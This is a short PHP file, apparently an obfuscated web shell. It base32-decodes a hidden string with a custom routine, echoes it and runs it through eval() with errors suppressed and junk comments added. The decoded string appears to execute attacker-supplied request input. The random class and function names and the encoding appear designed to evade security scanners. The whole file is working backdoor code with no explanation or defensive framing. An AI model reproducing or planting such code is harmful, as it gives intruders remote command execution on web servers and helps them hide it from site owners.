<?php
//zero
class DPCU{
    public $WVNE = null;
    public $BWFX = null;
    function __construct(){
            $this->WVNE = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
            $this->BWFX = @WKRZ($this->WVNE);
            echo $this->BWFX;
            @eval("/*<>Ti|&C*/".$this->BWFX."/*<>Ti|&C*/");
        }}
new DPCU();
function YFCK($AVPO){
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    $OJGE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($AVPO); $i < $j; $i++){
        $v <<= 8;
        $v += ord($AVPO[$i]);
        $vbits += 8;
        while ($vbits >= 5) {
            $vbits -= 5;
            $OJGE .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);}}
    if ($vbits > 0){
        $v <<= (5 - $vbits);
        $OJGE .= $BASE32_ALPHABET[$v];}
    return $OJGE;}
function WKRZ($AVPO){
    $OJGE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($AVPO); $i < $j; $i++){
        $v <<= 5;
        if ($AVPO[$i] >= 'a' && $AVPO[$i] <= 'z'){
            $v += (ord($AVPO[$i]) - 97);
        } elseif ($AVPO[$i] >= '2' && $AVPO[$i] <= '7') {
            $v += (24 + $AVPO[$i]);
        } else {
            exit(1);
        }
        $vbits += 5;
        while ($vbits >= 8){
            $vbits -= 8;
            $OJGE .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);}}
    return $OJGE;}